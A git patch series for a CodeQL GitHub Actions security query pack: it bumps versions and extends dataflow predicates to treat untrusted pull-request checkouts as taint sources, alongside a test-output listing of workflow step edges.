.github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | | .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | -| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | | .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | -| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | | .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | | .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | -| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | -| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | | .github/workflows/level0.yml:103:9:107:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | | .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | -| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | -| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | | .github/workflows/level0.yml:129:9:133:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | -| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | | .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | -| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | | .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:33:9:35:6 | Run Step | -| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | | .github/workflows/test3.yml:33:9:35:6 | Run Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:25:7:31:4 | Uses Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | -| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | -| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:58:9:60:2 | Run Step | | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | -| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | -| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | -| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | -| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | -| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select From 76ded33280cf2a6ea8c8c2abb05bb37dc6b41a39 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 23:29:36 +0200 Subject: [PATCH 418/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5cf222d25c7..6b17e77e0634 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.20 +version: 0.1.21 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6def1dfc0c82..d17bc34b9ab6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.20 +version: 0.1.21 groups: [actions, queries] suites: codeql-suites extractor: javascript From fc39249f924d5a8ed2a5ee5584a084b617543144 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 15 Jul 2024 21:00:28 +0200 Subject: [PATCH 419/707] feat(queries): Consider untrusted checkout as a source for code injections --- .../codeql/actions/dataflow/FlowSources.qll | 10 +++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 37 ++++++++++++++----- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-349/CachePoisoning.ql | 16 +++++--- ql/src/qlpack.yml | 2 +- .../.github/workflows/untrusted_checkout1.yml | 15 ++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 ++++ .../CWE-094/CodeInjectionMedium.expected | 7 ++++ 8 files changed, 79 insertions(+), 18 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 31cf33782b0b..9f91af470b29 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,4 +1,5 @@ private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.config.Config private import codeql.actions.dataflow.ExternalFlow @@ -112,6 +113,15 @@ private class ArtifactSource extends RemoteFlowSource { override string getSourceType() { result = "artifact" } } +/** + * A file from an untrusted checkout. + */ +private class CheckoutSource extends RemoteFlowSource { + CheckoutSource() { this.asExpr() instanceof PRHeadCheckoutStep } + + override string getSourceType() { result = "artifact" } +} + /** * A list of file names returned by dorny/paths-filter. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 3caf80b7ca8e..e16bc00f8ea9 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery /** * A unit class for adding additional taint steps. @@ -161,7 +162,11 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * echo "::set-output name=id::$foo */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, UntrustedArtifactDownloadStep download, string content, string key, string value | + exists(Run run, Step artifact, string content, string key, string value | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and ( // A file is read and its content is assigned to an env var // - run: | @@ -185,7 +190,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da outputsPartialFileContent(value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - download.getAFollowingStep() = run and + artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run ) @@ -199,7 +204,11 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da * echo "bar=${foo}" >> "$GITHUB_ENV" */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string content, string key, string value, UntrustedArtifactDownloadStep download | + exists(Run run, string content, string key, string value, Step artifact | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and ( // A file is read and its content is assigned to an env var // - run: | @@ -223,7 +232,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF outputsPartialFileContent(value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - download.getAFollowingStep() = run and + artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() @@ -234,10 +243,14 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF * A download artifact step followed by a step that may use downloaded artifacts. */ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UntrustedArtifactDownloadStep download, Run run | - pred.asExpr() = download and + exists(Step artifact, Run run | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and + pred.asExpr() = artifact and succ.asExpr() = run.getScriptScalar() and - download.getAFollowingStep() = run + artifact.getAFollowingStep() = run ) } @@ -245,11 +258,15 @@ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * A download artifact step followed by a envvar-injection uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UntrustedArtifactDownloadStep download, Uses uses | + exists(Step artifact, Uses uses | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and madSink(succ, "envvar-injection") and - pred.asExpr() = download and + pred.asExpr() = artifact and succ.asExpr() = uses and - download.getAFollowingStep() = uses + artifact.getAFollowingStep() = uses ) } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6b17e77e0634..75d8cd5d2e0c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.21 +version: 0.1.22 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 3b69110ed129..6609dae2b7f6 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps @@ -19,13 +20,17 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s +from LocalJob j, Event e, Step artifact, Step s where + ( + artifact instanceof PRHeadCheckoutStep or + artifact instanceof UntrustedArtifactDownloadStep + ) and j.getATriggerEvent() = e and // job can be triggered by an external user 